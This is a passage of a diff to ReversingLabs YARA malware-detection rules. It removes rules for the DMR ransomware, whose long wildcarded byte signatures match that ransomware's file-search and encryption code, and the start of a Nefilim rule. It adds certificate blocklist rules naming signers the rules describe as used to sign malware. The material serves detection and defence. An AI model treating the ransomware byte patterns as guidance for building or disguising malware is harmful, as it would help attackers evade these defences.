+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "5b:47:a4:73:9d:d8:ff:e8:1d:9b:53:07" and 1476953007 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_DMR : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4F5A9Bf75Da76B949645475473793A7D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DMR ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "45d8f91f-d2d0-5c6e-a29e-b8c9c29dc296"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "90cdf420-bdfc-509a-a64f-f30710f09f3b"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DMR.yara#L1-L214"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14712-L14728"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "55e19f3017c2cc8355c27f9a516e611b58b108f15bfed41b88d5662b55677a59"
+		logic_hash = "8c58d30b1b6ef80409d9da5f5f4bc26a8818b01cc388b5966c8b68ed0e4c5a2a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DMR"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53
-            57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ??
-            51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ??
-            ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
-            ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B
-            CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ??
-            23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8
-            1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
-            ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74
-        }
-		$find_files_p2 = {
-            80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ??
-            ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ??
-            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ??
-            ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ??
-            5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 8D 45 ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 55 ?? FF B5 ?? ?? ??
-            ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
-            8B 55 ?? 88 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
-            E8 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 84 ?? ?? ?? ?? C6 85 ?? ?? ?? ??
-            ?? 8D 55 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 45 ??
-            83 7D ?? ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83 E0 ?? 8D 4D ?? 83 7D ?? ?? 50 0F 43
-        }
-		$encrypt_files_p2 = {
-            4D ?? 51 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 8D
-            ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ??
-            ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D BE ??
-            ?? ?? ?? C6 45 ?? ?? 83 7F ?? ?? 8B C7 89 BD ?? ?? ?? ?? 72 ?? 8B 07 83 7F ?? ?? 75
-            ?? 0F B6 00 3C ?? 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? C7 86 ?? ?? ?? ?? ??
-            ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 8B 86 ?? ?? ?? ?? 6A ?? 50 8D 4D ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 8B 86 ?? ??
-            ?? ?? 83 7D ?? ?? 99 0F 43 4D ?? 52 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ??
-            ?? ?? ?? 8B 55 ?? 3B CA 77 ?? 83 7D ?? ?? 8D 45 ?? 89 4D ?? 0F 43 45 ?? C6 04 01 ??
-            EB ?? 8B 45 ?? 8B F9 2B FA 2B C2 3B F8 77 ?? 83 7D ?? ?? 8D 75 ?? 57 0F 43 75 ?? 03
-        }
-		$encrypt_files_p3 = {
-            F2 89 4D ?? 6A ?? 56 E8 ?? ?? ?? ?? C6 04 3E ?? 83 C4 ?? 8B B5 ?? ?? ?? ?? EB ?? 6A
-            ?? 57 C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B BD ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8
-            ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
-            6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 50 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 8D
-            85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 8B 40 ?? FF D0 85 C0 74 ?? 8B
-            08 6A ?? 8B 11 8B C8 FF D2 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 D2 8B 40 ?? 03 C8
-            B8 ?? ?? ?? ?? 39 51 ?? 0F 45 C2 EB ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ??
-            03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 6A ?? 50 E8 ?? ?? ?? ??
-            81 C6 ?? ?? ?? ?? 8D 45 ?? 3B F0 74 ?? 83 7D ?? ?? 8B CE FF 75 ?? 0F 43 45 ?? 50 E8
-            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45
-        }
-		$encrypt_files_p4 = {
-            C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 7F ?? ?? 8B 47 ?? 72 ?? 8B 3F 83 F8 ?? 75
-            ?? 0F B6 07 3C ?? 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 8B BD ?? ?? ?? ?? 85 C0 75 ?? 8D
-            45 ?? 50 83 EC ?? 8D 87 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC
-            ?? C6 45 ?? ?? 8B CC 56 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? EB ?? 8B BD ?? ??
-            ?? ?? 8D 45 ?? 3B F0 74 ?? 83 7D ?? ?? 8B CE FF 75 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ??
-            8D 45 ?? 3B C6 74 ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 FF 76 ?? 8D 4D ?? 50 E8 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 C7 46 ??
-            ?? ?? ?? ?? 8D 55 ?? C6 00 ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? FF 75 ?? 0F 43 55 ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ??
-            0B 41 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8B C8 C6
-            45 ?? ?? 8B 41 ?? 8B 51 ?? 2B C2 83 F8 ?? 72 ?? 83 79 ?? ?? 8D 42 ?? 89 41 ?? 8B C1
-            72 ?? 8B 01 66 C7 04 02 ?? ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 0F 10 01 0F 11 85 ?? ?? ?? ?? F3 0F 7E 41 ?? 66 0F D6 85 ?? ?? ?? ??
-            C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 8B
-        }
-		$encrypt_files_p5 = {
-            C2 8B 8D ?? ?? ?? ?? 2B C1 83 F8 ?? 72 ?? 8D 41 ?? 83 FA ?? 89 85 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? C7 04 01 ?? ?? ?? ?? C6 44 01 ?? ?? 8D 85 ?? ?? ??
-            ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ??
-            ?? 6A ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ??
-            ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? 8D 47 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11
-            85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ??
-            ?? ?? ?? ?? C6 00 ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 83
-            F8 ?? 72 ?? 8D 41 ?? 83 FA ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ??
-            ?? 66 C7 04 08 ?? ?? 8D 85 ?? ?? ?? ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66
-            0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? C6 45
-        }
-		$encrypt_files_p6 = {
-            8B BD ?? ?? ?? ?? 8B C7 8B 8D ?? ?? ?? ?? 2B C1 8B 56 ?? 3B D0 76 ?? 8B 46 ?? 2B C2
-            3B C1 72 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 51 0F 43 85 ?? ?? ?? ?? 8B CE 50 6A ?? E8 ??
-            ?? ?? ?? EB ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85
-            ?? ?? ?? ?? C6 00 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ??
-            ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 6A ?? 68 ?? ?? ?? ?? 83 F8 ?? 72 ?? 83 FA ??
-            8D B5 ?? ?? ?? ?? 8D 41 ?? 0F 43 B5 ?? ?? ?? ?? 03 F1 89 85 ?? ?? ?? ?? 56 E8 ?? ??
-            ?? ?? 83 C4 ?? C6 46 ?? ?? 8D 85 ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 0F 10 00 0F 11 45 ?? F3 0F 7E 40 ?? 66
-            0F D6 45 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? C6 45 ?? ?? 8B 95 ??
-            ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ??
-            83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45
-            ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ??
-            72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ??
-            ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
-            ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81
-        }
-		$encrypt_files_p7 = {
-            FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52
-            51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ??
-            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ??
-            8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ??
-            83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ??
-            83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
-            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B
-        }
-		$encrypt_files_p8 = {
-            95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ??
-            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8
-            ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 66 89 85 ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ??
-            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ??
-            8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2
-            ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 83 EC ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0
-            C6 45 ?? ?? 83 7E ?? ?? 72 ?? 8B 36 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 56 50 E8 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ??
-            ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
-            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ??
-            ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
-        }
-		$encrypt_files_p9 = {
-            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ??
-            72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
-            F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D
-            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
-            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
-            ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
-            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
-            8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ??
-            8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55
-            ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
-            83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ??
-            59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXEC CONTROL LIMITED" and pe.signatures [ i ] . serial == "4f:5a:9b:f7:5d:a7:6b:94:96:45:47:54:73:79:3a:7d" and 1553817600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_081Df56C9A48D02571F08907 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "4f4fb099-406a-5def-9a26-46c6807cfe7f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14730-L14746"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "25d91f09e0731ab09a05855442b72589eb30e1c7d5e4c0a7af760eea540d786f"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "08:1d:f5:6c:9a:48:d0:25:71:f0:89:07" and 1474870728 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Nefilim : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_77D5C1A3E623575999C74409Dc19753C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Nefilim ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "aec298c1-abf8-5446-9dbb-795f9fcf8e94"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "8f8ce24d-8330-509a-a7a1-2727c6f8bdd9"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Nefilim.yara#L1-L150"
